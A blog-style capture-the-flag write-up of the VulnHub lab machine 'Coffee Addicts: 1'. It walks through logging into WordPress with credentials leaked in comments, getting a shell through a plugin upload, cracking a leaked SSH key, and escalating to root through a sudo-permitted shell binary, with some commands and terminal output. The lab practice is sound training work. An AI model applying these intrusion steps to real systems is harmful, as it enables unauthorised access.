Yesterday evening I did Explore from HTB but that’s a new machine so no writeup. It was pretty neat though. So, instead of that here is:


This is COFFEE ADDICTS: 1 from VulnHub.

Our coffee shop has been hacked!! can you fix the damage and find who did it?.

It doesn’t say how difficult it’s supposed to be, but I’ll say easy. Let’s go.


SSH and HTTP only.


The premise here is that the website has been hacked. It’s Wordpress (a recent version), but the username and password is ‘hiding’ in plain sight, so yeah no wonder lol.

At http://coffeeaddicts.thm/wordpress/?p=9#comments we find this caption under a photo of some hobo looking dude:

gus i need you back

And underneath that is this:

Lucy Longmire says:	
April 16, 2021 at 12:19 am	

yo, is that your password??

    gus says:	
    April 16, 2021 at 12:19 am	

    what could go wrong? uwur

Just to drive the point home. So; we login to Wordpress with gus:gusineedyouback and I get a shell by uploading a plugin.


The system has been pwned by BadByte, who has created themselves an SSH key which we can read.

www-data@CoffeeAdicts:/home/badbyte/.ssh$ ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x 2 root    root    4.0K Apr  6 15:09 .
4.0K drwxr-xr-x 5 badbyte badbyte 4.0K Apr 15 16:03 ..
4.0K -rw-r--r-- 1 root    root    1.8K Apr  6 15:09 id_rsa

This is encrypted with a weak password so it’s ssh2john then crack it and login:

└─# ssh -i id_rsa badbyte@coffeeaddicts.thm
Enter passphrase for key 'id_rsa': 
badbyte@coffeeaddicts.thms password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-140-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Tue Jun 29 02:02:36 AKDT 2021

  System load:  0.0               Processes:             108
  Usage of /:   52.3% of 7.81GB   Users logged in:       0
  Memory usage: 56%               IP address for enp0s3:
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

81 packages can be updated.
49 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Last login: Sun Jun 20 01:49:14 2021 from
badbyte@CoffeeAdicts:~$ sudo -l
[sudo] password for badbyte: 
Matching Defaults entries for badbyte on CoffeeAdicts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User badbyte may run the following commands on CoffeeAdicts:
    (root) /opt/BadByte/shell
badbyte@CoffeeAdicts:~$ sudo -u root /opt/BadByte/shell
BadByte # id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Tue Jun 29 02:03:00 AKDT 2021
BadByte # cd /root
BadByte # sh: 1: /root: Permission denied
BadByte # ls /root
BadByte # sh: 1: /root: Permission denied
BadByte # /bin/bash
root@CoffeeAdicts:~# cd /root
root@CoffeeAdicts:/root# ls -lash
total 36K
4.0K drwx------  3 root root 4.0K Apr  6 15:02 .
4.0K drwxr-xr-x 23 root root 4.0K Apr  6 12:54 ..
4.0K -rw-------  1 root root 1.1K Apr  6 14:28 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
4.0K drwxr-xr-x  3 root root 4.0K Apr  6 13:33 .local
4.0K -rw-------  1 root root  142 Apr  6 13:41 .mysql_history
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root   20 Apr  6 15:02 .python_history
4.0K -rw-r--r--  1 root root   25 Apr  6 14:28 root.txt
root@CoffeeAdicts:/root# cat root.txt

So, nothing groundbreaking here but I guess it’s all grist to the mill.

Oh obviously at some stage this was intended to be a THM room. It’s listed as private at the moment but you can still join if you know how :)